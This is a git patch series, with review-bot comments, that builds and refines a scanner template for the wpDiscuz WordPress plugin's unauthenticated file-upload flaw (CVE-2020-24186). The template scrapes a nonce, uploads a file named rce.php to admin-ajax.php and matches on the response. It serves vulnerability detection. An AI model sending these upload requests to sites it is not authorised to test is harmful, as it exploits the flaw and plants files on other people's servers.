From 5d61184601a388060e93fbf93c8fb3aa1ae78544 Mon Sep 17 00:00:00 2001
From: Ganesh Bagaria <11516116+Ganofins@users.noreply.github.com>
Date: Sun, 28 Feb 2021 12:53:43 +0530
Subject: [PATCH 1/7] Create CVE-2020-24186.yaml
---
 cves/2020/CVE-2020-24186.yaml | 54 +++++++++++++++++++++++++++++++++++
 1 file changed, 54 insertions(+)
 create mode 100644 cves/2020/CVE-2020-24186.yaml
diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
new file mode 100644
index 0000000000..5b9394c61e
--- /dev/null
+++ b/cves/2020/CVE-2020-24186.yaml
@@ -0,0 +1,54 @@
+id: CVE-2020-24186
+
+info:
+ name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin
+ author: Ganofins
+ severity: high
+ description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
+ reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
+ tags: cve,cve2020,wordpress,wp-plugin
+
+requests:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 774
+ Accept: */*
+ X-Requested-With: XMLHttpRequest
+ User-Agent:
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-US,en;q=0.9
+ Cookie:
+ Connection: close
+
+ ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ Content-Disposition: form-data; name="action"
+
+ wmuUploadFiles
+ ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ Content-Disposition: form-data; name="wmu_nonce"
+
+ aede3ab0b2
+ ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ Content-Disposition: form-data; name="wmuAttachmentsData"
+
+ undefined
+ ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
+ Content-Type: image/jpeg
+
+ ÿØÿájExifMM*���i��>����������¨����À�����������ÿà�JFIF����ÿÛC���
+ ��
+
+ ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ Content-Disposition: form-data; name="postId"
+
+ 393
+ ------WebKitFormBoundaryUGWBOKSwsalnzhha--
+
+ matchers:
+ - type: status
+ status:
+ - 200
From 470ce5500364d75db9fea9906ecc04b9835cf71e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+bauthard@users.noreply.github.com>
Date: Sun, 28 Feb 2021 13:36:59 +0530
Subject: [PATCH 2/7] Update CVE-2020-24186.yaml
---
 cves/2020/CVE-2020-24186.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
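Review bot: The sole matcher `status: 200` cannot tell a completed upload apart from any other call to admin-ajax.php, which answers 200 to unknown actions as well, so this version of the template flags every WordPress site it touches; the upload handler's response body has to be matched too. The `wmu_nonce` value `aede3ab0b2` is a WordPress nonce recorded from one site and session and will not be accepted anywhere else, and the raw JPEG bytes on the `wmu_files[0]` line are unlikely to survive YAML loading intact. Later patches in this series replace all three (extracted nonce, base64-encoded bytes, body matchers), so the fixes need not be repeated here, but this initial version should not be merged on its own.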
diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
index 5b9394c61e..bf916c400a 100644
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
@@ -16,11 +16,11 @@ requests:
 Content-Length: 774
 Accept: */*
 X-Requested-With: XMLHttpRequest
- User-Agent:
+ User-Agent:
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
- Cookie:
+ Cookie:
 Connection: close
 ------WebKitFormBoundaryUGWBOKSwsalnzhha
From 83fd749b4eeacab5523f3d1e42706ea5c853694e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 14 Mar 2021 19:47:36 +0530
Subject: [PATCH 3/7] template update
---
 cves/2020/CVE-2020-24186.yaml | 87 ++++++++++++++++++++++++-----------
 1 file changed, 61 insertions(+), 26 deletions(-)
diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
index bf916c400a..1da1e88e32 100644
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
@@ -1,54 +1,89 @@
 id: CVE-2020-24186
 info:
- name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin
+ name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
 author: Ganofins
 severity: high
 description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
 reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
- tags: cve,cve2020,wordpress,wp-plugin
+ tags: cve,cve2020,wordpress,wp-plugin,rce
 requests:
 - raw:
 - |
- POST /wp-admin/admin-ajax.php HTTP/1.1
+ GET /?p=1 HTTP/1.1
 Host: {{Hostname}}
- Content-Length: 774
 Accept: */*
- X-Requested-With: XMLHttpRequest
- User-Agent:
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.9
- Cookie:
 Connection: close
- ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 745
+ Accept: */*
+ X-Requested-With: XMLHttpRequest
+ sec-ch-ua-mobile: ?0
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
+ Origin: {{BaseURL}}
+ Sec-Fetch-Site: same-origin
+ Sec-Fetch-Mode: cors
+ Sec-Fetch-Dest: empty
+ Referer: {{BaseURL}}
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: close
+
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="action"
-
+
 wmuUploadFiles
- ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="wmu_nonce"
-
- aede3ab0b2
- ------WebKitFormBoundaryUGWBOKSwsalnzhha
+
+ {{wmuSecurity}}
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="wmuAttachmentsData"
-
+
 undefined
- ------WebKitFormBoundaryUGWBOKSwsalnzhha
- Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
- Content-Type: image/jpeg
-
- ÿØÿájExifMM*���i��>����������¨����À�����������ÿà�JFIF����ÿÛC���
- ��
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
+ Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
+ Content-Type: image/png
+
+ {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
- ------WebKitFormBoundaryUGWBOKSwsalnzhha
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="postId"
+
+ 1
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak--
- 393
- ------WebKitFormBoundaryUGWBOKSwsalnzhha--
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: wmuSecurity
+ group: 1
+ regex:
+ - 'wmuSecurity":"([a-z0-9]+)'
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"url":"([a-z:\\/0-9-.]+)"'
+
+ matchers-condition: and
 matchers:
 - type: status
 status:
 - 200
+
+ - type: word
+ words:
+ - 'success":true'
+ - 'fullname'
+ - 'shortname'
+ - 'url'
+ condition: and
+ part: body
From 6a976742d8345b1650f41828ed649c65d230e874 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 14 Mar 2021 19:48:25 +0530
Subject: [PATCH 4/7] Update CVE-2020-24186.yaml
---
 cves/2020/CVE-2020-24186.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
index 1da1e88e32..c0face66e9 100644
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
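Review bot: The second request stores a file named `rce.php` in the target's upload area and nothing in the template removes it, yet neither `description` nor the tags say so; add to `info` a sentence such as `This check uploads a file named rce.php to the target and does not remove it; clean up after scanning.`, and state the affected version range rather than only `version 7.0.4`. `Content-Length: 745` is hard-coded while the body contains the extracted `{{wmuSecurity}}` value; unless the engine recomputes the header for raw requests, any length difference truncates or stalls the request, so the header is better dropped. The `wmuSecurity` extractor is `internal: true` with no fallback, so when `GET /?p=1` carries no wpDiscuz comment form (post ID 1 absent or comments disabled) the second request presumably goes out with an unresolved placeholder, and the `postId` of `1` rests on the same assumption. The `url` regex `[a-z:\\/0-9-.]+` also rejects uppercase letters and `_`, so the reported upload URL may be missing on some hosts.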
@@ -3,7 +3,7 @@ id: CVE-2020-24186
 info:
 name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
 author: Ganofins
- severity: high
+ severity: critical
 description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
 reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
 tags: cve,cve2020,wordpress,wp-plugin,rce
From 53359a730883fa6cfdc989aef468a5db0fc12640 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 14 Mar 2021 19:50:00 +0530
Subject: [PATCH 5/7] Update CVE-2020-24186.yaml
---
 cves/2020/CVE-2020-24186.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
index c0face66e9..41aba98766 100644
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
@@ -36,15 +36,15 @@ requests:
 ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="action"
-
+
 wmuUploadFiles
 ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="wmu_nonce"
-
+
 {{wmuSecurity}}
 ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="wmuAttachmentsData"
-
+
 undefined
 ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
@@ -54,7 +54,7 @@ requests:
 ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="postId"
-
+
 1
 ------WebKitFormBoundary88AhjLimsDMHU1Ak--
From 10b262f8cf532d048720e73eea2d46e19b854c6b Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 14 Mar 2021 19:51:15 +0530
Subject: [PATCH 6/7] Adding to workflow
---
 workflows/wordpress-workflow.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index 36be8a7c7b..1e53dfd7d1 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -22,6 +22,7 @@ workflows:
 - template: cves/2019/CVE-2019-19985.yaml
 - template: cves/2019/CVE-2019-20141.yaml
 - template: cves/2020/CVE-2020-11738.yaml
+ - template: cves/2020/CVE-2020-24186.yaml
 - template: cves/2020/CVE-2020-24312.yaml
 - template: cves/2020/CVE-2020-25213.yaml
 - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
@@ -45,4 +46,4 @@ workflows:
 - template: vulnerabilities/wordpress/wp-enabled-registration.yaml
 - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
 - template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- - template: vulnerabilities/wordpress/wp-license-file.yaml
+ - template: vulnerabilities/wordpress/wp-license-file.yaml
\ No newline at end of file
From 9848b3b6719a3407e2a60648861e58aa059d37ea Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 14 Mar 2021 19:53:07 +0530
Subject: [PATCH 7/7] Update CVE-2020-24186.yaml
---
 cves/2020/CVE-2020-24186.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
index 41aba98766..db823bc245 100644
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
@@ -49,7 +49,7 @@ requests:
 ------WebKitFormBoundary88AhjLimsDMHU1Ak
 Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
 Content-Type: image/png
-
+
 {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
 ------WebKitFormBoundary88AhjLimsDMHU1Ak
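Review bot: The second hunk of the workflow change alters nothing but the file's last line, replacing it with a copy that lacks a trailing newline (`\ No newline at end of file`), which makes every later edit to the end of this list show up as a spurious change; restore the newline so the first hunk is the only change. The template list is otherwise a plain insertion of `cves/2020/CVE-2020-24186.yaml` in its sorted position.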